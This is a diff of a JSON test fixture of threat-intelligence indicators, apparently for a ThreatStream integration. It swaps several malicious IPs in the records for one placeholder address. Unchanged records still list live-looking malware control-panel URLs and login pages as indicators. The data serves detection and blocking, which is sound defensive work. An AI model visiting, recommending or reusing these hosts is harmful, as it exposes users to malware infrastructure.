@@ -12755,16 +12755,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://185.136.159.206/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "185.136.159.206", - "full": "http://185.136.159.206/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386226927Z", - "original": "{\"created\":\"2020-02-01T02:07:36.513Z\",\"description\":\"TS ID: 55277443145; iType: mal_url; State: active; Org: Host Europe GmbH; Source: CyberCrime\",\"id\":\"indicator--4cd504ee-3b5e-439f-b37d-3e932b200a55\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-01T02:07:36.513Z\",\"name\":\"mal_url: http://185.136.159.206/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://185.136.159.206/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:07:36.513Z\"}", + "ingested": "2021-12-13T08:38:40.024025500Z", + "original": "{\"created\":\"2020-02-01T02:07:36.513Z\",\"description\":\"TS ID: 55277443145; iType: mal_url; State: active; Org: Host Europe GmbH; Source: CyberCrime\",\"id\":\"indicator--4cd504ee-3b5e-439f-b37d-3e932b200a55\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-01T02:07:36.513Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:07:36.513Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12815,7 +12815,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386240623Z", + "ingested": "2021-12-13T08:38:40.024032700Z", "original": "{\"created\":\"2020-02-01T02:08:09.833Z\",\"description\":\"TS ID: 55277443560; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--7d803ca2-4e7d-414e-9693-854d08c49bb6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-01T02:08:09.833Z\",\"name\":\"mal_url: http://drop-box.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://drop-box.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:09.833Z\"}", "category": "threat", "type": "indicator", @@ -12834,7 +12834,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://94.177.123.112/xcool!/admin.php", + "name": "mal_url: http://89.160.20.156/xcool!/admin.php", "description": "TS ID: 55277442673; iType: mal_url; State: active; Org: Mir Telematiki Ltd; Source: CyberCrime", "modified": "2020-02-01T02:08:09.939Z", "valid_from": "2020-02-01T02:08:09.939Z", 
@@ -12859,16 +12859,16 @@ "url": { "path": "/xcool!/admin.php", "extension": "php", - "original": "http://94.177.123.112/xcool!/admin.php", + "original": "http://89.160.20.156/xcool!/admin.php", "scheme": "http", - "domain": "94.177.123.112", - "full": "http://94.177.123.112/xcool!/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/xcool!/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386248578Z", - "original": "{\"created\":\"2020-02-01T02:08:09.939Z\",\"description\":\"TS ID: 55277442673; iType: mal_url; State: active; Org: Mir Telematiki Ltd; Source: CyberCrime\",\"id\":\"indicator--7cbc0a23-df38-4526-84b1-b344948f0b72\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-63\"],\"modified\":\"2020-02-01T02:08:09.939Z\",\"name\":\"mal_url: http://94.177.123.112/xcool!/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://94.177.123.112/xcool!/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:09.939Z\"}", + "ingested": "2021-12-13T08:38:40.024040100Z", + "original": "{\"created\":\"2020-02-01T02:08:09.939Z\",\"description\":\"TS ID: 55277442673; iType: mal_url; State: active; Org: Mir Telematiki Ltd; Source: CyberCrime\",\"id\":\"indicator--7cbc0a23-df38-4526-84b1-b344948f0b72\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-63\"],\"modified\":\"2020-02-01T02:08:09.939Z\",\"name\":\"mal_url: http://89.160.20.156/xcool!/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/xcool!/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:09.939Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12886,7 +12886,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 47.241.1.46", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55277443138; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime", "modified": "2020-02-01T02:08:31.777Z", "valid_from": "2020-02-01T02:08:31.777Z", @@ -12908,12 +12908,12 @@ "first_seen": "2020-02-01T02:08:31.777Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "47.241.1.46" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386254269Z", - "original": "{\"created\":\"2020-02-01T02:08:31.777Z\",\"description\":\"TS ID: 55277443138; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--9530c9fb-99b6-40af-b14a-a622cff510b1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-01T02:08:31.777Z\",\"name\":\"mal_ip: 47.241.1.46\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '47.241.1.46']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:31.777Z\"}", + "ingested": "2021-12-13T08:38:40.024047200Z", + "original": "{\"created\":\"2020-02-01T02:08:31.777Z\",\"description\":\"TS ID: 55277443138; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--9530c9fb-99b6-40af-b14a-a622cff510b1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-01T02:08:31.777Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:31.777Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12931,7 +12931,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 95.163.212.79", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55277442273; iType: mal_ip; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime", "modified": "2020-02-01T02:08:31.818Z", "valid_from": "2020-02-01T02:08:31.818Z", @@ -12953,12 +12953,12 @@ "first_seen": "2020-02-01T02:08:31.818Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "95.163.212.79" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386259999Z", - "original": "{\"created\":\"2020-02-01T02:08:31.818Z\",\"description\":\"TS ID: 55277442273; iType: mal_ip; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--6955fd8f-b856-43aa-bac7-0d5a2d8519f2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:08:31.818Z\",\"name\":\"mal_ip: 95.163.212.79\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '95.163.212.79']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:31.818Z\"}", + "ingested": "2021-12-13T08:38:40.024051300Z", + "original": "{\"created\":\"2020-02-01T02:08:31.818Z\",\"description\":\"TS ID: 55277442273; iType: mal_ip; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--6955fd8f-b856-43aa-bac7-0d5a2d8519f2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:08:31.818Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:31.818Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -13009,7 +13009,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386265219Z", + "ingested": "2021-12-13T08:38:40.024056600Z", "original": "{\"created\":\"2020-02-01T02:08:42.76Z\",\"description\":\"TS ID: 55277443599; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--4c8f8d86-da50-48bb-a41b-8a002561315a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-01T02:08:42.76Z\",\"name\":\"mal_url: http://digi-sec.top/lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://digi-sec.top/lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:42.76Z\"}", "category": "threat", "type": "indicator", @@ -13061,7 +13061,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386269778Z", + "ingested": "2021-12-13T08:38:40.024061900Z", "original": "{\"created\":\"2020-02-01T02:09:05.295Z\",\"description\":\"TS ID: 55277443514; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--3639e6da-8159-4dd6-b928-b8189c29159f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-02-01T02:09:05.295Z\",\"name\":\"mal_url: http://everest--sh.com/cola/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://everest--sh.com/cola/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:09:05.295Z\"}", "category": "threat", "type": "indicator", 
@@ -13112,7 +13112,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386274296Z", + "ingested": "2021-12-13T08:38:40.024067600Z", "original": "{\"created\":\"2020-02-01T02:09:13.398Z\",\"description\":\"TS ID: 55277443134; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--7d4bf98b-8fc2-427c-a08b-f432e43c1110\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-01T02:09:13.398Z\",\"name\":\"mal_url: http://moonberry.pk/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://moonberry.pk/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:09:13.398Z\"}", "category": "threat", "type": "indicator", @@ -13164,7 +13164,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386295396Z", + "ingested": "2021-12-13T08:38:40.024071500Z", "original": "{\"created\":\"2020-02-01T02:09:49.804Z\",\"description\":\"TS ID: 55277442688; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--0f2bf75c-d534-48e9-a25f-940cc5f673ed\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-01T02:09:49.804Z\",\"name\":\"mal_url: http://207.246.67.4/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://207.246.67.4/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:09:49.804Z\"}", "category": "threat", "type": "indicator", 
@@ -13216,7 +13216,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386302730Z", + "ingested": "2021-12-13T08:38:40.024077200Z", "original": "{\"created\":\"2020-02-01T02:09:56.524Z\",\"description\":\"TS ID: 55277443239; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--0cdef192-7b00-48b1-b8d4-a9642e37d630\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:09:56.524Z\",\"name\":\"mal_url: http://farzanatradings.com/odogwu/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farzanatradings.com/odogwu/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:09:56.524Z\"}", "category": "threat", "type": "indicator", @@ -13268,7 +13268,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386308290Z", + "ingested": "2021-12-13T08:38:40.024081400Z", "original": "{\"created\":\"2020-02-01T02:10:00.889Z\",\"description\":\"TS ID: 55277443489; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--e409b749-d733-4b69-83cf-4df74ac8fd2b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:10:00.889Z\",\"name\":\"mal_url: http://gpi-q.com/clean/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/clean/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:00.889Z\"}", "category": "threat", "type": "indicator", 
@@ -13320,7 +13320,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386313009Z", + "ingested": "2021-12-13T08:38:40.024085900Z", "original": "{\"created\":\"2020-02-01T02:10:04.196Z\",\"description\":\"TS ID: 55277443402; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--347a1f39-78c4-4f71-b125-decaba2489b4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:10:04.196Z\",\"name\":\"mal_url: http://trouserlanditd.com/drug/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trouserlanditd.com/drug/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:04.196Z\"}", "category": "threat", "type": "indicator", @@ -13372,7 +13372,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386318219Z", + "ingested": "2021-12-13T08:38:40.024089400Z", "original": "{\"created\":\"2020-02-01T02:10:04.234Z\",\"description\":\"TS ID: 55277443231; iType: mal_url; State: active; Org: Fornex Hosting S.L.; Source: CyberCrime\",\"id\":\"indicator--acd84a21-6112-4bbb-9132-fa50a9b7b07c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:10:04.234Z\",\"name\":\"mal_url: http://nextbridge.info/god/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nextbridge.info/god/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:04.234Z\"}", "category": "threat", "type": "indicator", 
@@ -13391,7 +13391,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_url: http://45.86.65.210/panel/admin.php",
+ "name": "mal_url: http://89.160.20.156/panel/admin.php",
 "description": "TS ID: 55277442692; iType: mal_url; State: active; Source: CyberCrime",
 "modified": "2020-02-01T02:10:18.897Z",
 "valid_from": "2020-02-01T02:10:18.897Z",
@@ -13416,16 +13416,16 @@ "url": { "path": "/panel/admin.php", "extension": "php", - "original": "http://45.86.65.210/panel/admin.php", + "original": "http://89.160.20.156/panel/admin.php", "scheme": "http", - "domain": "45.86.65.210", - "full": "http://45.86.65.210/panel/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/panel/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386322567Z", - "original": "{\"created\":\"2020-02-01T02:10:18.897Z\",\"description\":\"TS ID: 55277442692; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--d2990eea-f233-4296-b7ea-dc78ad48f1a3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-01T02:10:18.897Z\",\"name\":\"mal_url: http://45.86.65.210/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://45.86.65.210/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:18.897Z\"}", + "ingested": "2021-12-13T08:38:40.024094700Z", + "original": "{\"created\":\"2020-02-01T02:10:18.897Z\",\"description\":\"TS ID: 55277442692; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--d2990eea-f233-4296-b7ea-dc78ad48f1a3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-01T02:10:18.897Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:18.897Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -13476,7 +13476,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386327266Z", + "ingested": "2021-12-13T08:38:40.024100500Z", "original": "{\"created\":\"2020-02-01T02:10:19.383Z\",\"description\":\"TS ID: 55277443285; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--ca6a96b9-60e6-429f-9223-7009c1a5e164\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:10:19.383Z\",\"name\":\"mal_url: http://corpcougar.com/collins/32/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/collins/32/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:19.383Z\"}", "category": "threat", "type": "indicator", @@ -13495,7 +13495,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 92.63.197.239", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55277443195; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime", "modified": "2020-02-01T02:10:19.417Z", "valid_from": "2020-02-01T02:10:19.417Z", 
@@ -13517,12 +13517,12 @@ "first_seen": "2020-02-01T02:10:19.417Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "92.63.197.239" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386331614Z", - "original": "{\"created\":\"2020-02-01T02:10:19.417Z\",\"description\":\"TS ID: 55277443195; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--1339e0b5-4398-4de4-9175-e685b6d0f5a4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-01T02:10:19.417Z\",\"name\":\"mal_ip: 92.63.197.239\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '92.63.197.239']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:19.417Z\"}", + "ingested": "2021-12-13T08:38:40.024106700Z", + "original": "{\"created\":\"2020-02-01T02:10:19.417Z\",\"description\":\"TS ID: 55277443195; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--1339e0b5-4398-4de4-9175-e685b6d0f5a4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-01T02:10:19.417Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:19.417Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -13573,7 +13573,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386336052Z", + "ingested": "2021-12-13T08:38:40.024114200Z", "original": "{\"created\":\"2020-02-01T02:10:39.062Z\",\"description\":\"TS ID: 55277443225; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--5a37e909-b130-4f49-b1d5-f4645a9d4c21\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-01T02:10:39.062Z\",\"name\":\"mal_url: http://pom4ekk.myjino.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pom4ekk.myjino.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:39.062Z\"}", "category": "threat", "type": "indicator", @@ -13592,7 +13592,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://5.188.60.62/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55277443198; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-02-01T02:10:42.316Z", "valid_from": "2020-02-01T02:10:42.316Z", 
@@ -13616,16 +13616,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://5.188.60.62/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "5.188.60.62", - "full": "http://5.188.60.62/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386340370Z", - "original": "{\"created\":\"2020-02-01T02:10:42.316Z\",\"description\":\"TS ID: 55277443198; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--9c6caf78-5bcd-4f6f-bc0f-d094a027a811\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-01T02:10:42.316Z\",\"name\":\"mal_url: http://5.188.60.62/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5.188.60.62/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:42.316Z\"}", + "ingested": "2021-12-13T08:38:40.024121400Z", + "original": "{\"created\":\"2020-02-01T02:10:42.316Z\",\"description\":\"TS ID: 55277443198; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--9c6caf78-5bcd-4f6f-bc0f-d094a027a811\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-01T02:10:42.316Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:42.316Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -13676,7 +13676,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386345169Z", + "ingested": "2021-12-13T08:38:40.024128600Z", "original": "{\"created\":\"2020-02-01T02:11:07.132Z\",\"description\":\"TS ID: 55277443508; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--d5f6e0de-d0bb-48f9-931d-5f4fd725a712\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:11:07.132Z\",\"name\":\"mal_url: http://gpi-q.com/clap/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:07.132Z\"}", "category": "threat", "type": "indicator", @@ -13728,7 +13728,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386349477Z", + "ingested": "2021-12-13T08:38:40.024135800Z", "original": "{\"created\":\"2020-02-01T02:11:07.159Z\",\"description\":\"TS ID: 55277443305; iType: mal_url; State: active; Org: LLC Baxet; Source: CyberCrime\",\"id\":\"indicator--d2ef46a3-6df2-4cc9-bb15-886dc24d41e5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-01T02:11:07.159Z\",\"name\":\"mal_url: http://betprognoz.pro/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://betprognoz.pro/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:07.159Z\"}", "category": "threat", "type": "indicator", 
@@ -13747,7 +13747,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_url: http://185.244.151.170/login",
+ "name": "mal_url: http://89.160.20.156/login",
 "description": "TS ID: 55277443141; iType: mal_url; State: active; Org: Host Sailor Ltd.; Source: CyberCrime",
 "modified": "2020-02-01T02:11:33.332Z",
 "valid_from": "2020-02-01T02:11:33.332Z",
@@ -13771,16 +13771,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://185.244.151.170/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "185.244.151.170", - "full": "http://185.244.151.170/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386353896Z", - "original": "{\"created\":\"2020-02-01T02:11:33.332Z\",\"description\":\"TS ID: 55277443141; iType: mal_url; State: active; Org: Host Sailor Ltd.; Source: CyberCrime\",\"id\":\"indicator--6c50f1f6-c27a-4484-ac53-728654ba2db3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:11:33.332Z\",\"name\":\"mal_url: http://185.244.151.170/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://185.244.151.170/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:33.332Z\"}", + "ingested": "2021-12-13T08:38:40.024142800Z", + "original": "{\"created\":\"2020-02-01T02:11:33.332Z\",\"description\":\"TS ID: 55277443141; iType: mal_url; State: active; Org: Host Sailor Ltd.; Source: CyberCrime\",\"id\":\"indicator--6c50f1f6-c27a-4484-ac53-728654ba2db3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:11:33.332Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:33.332Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
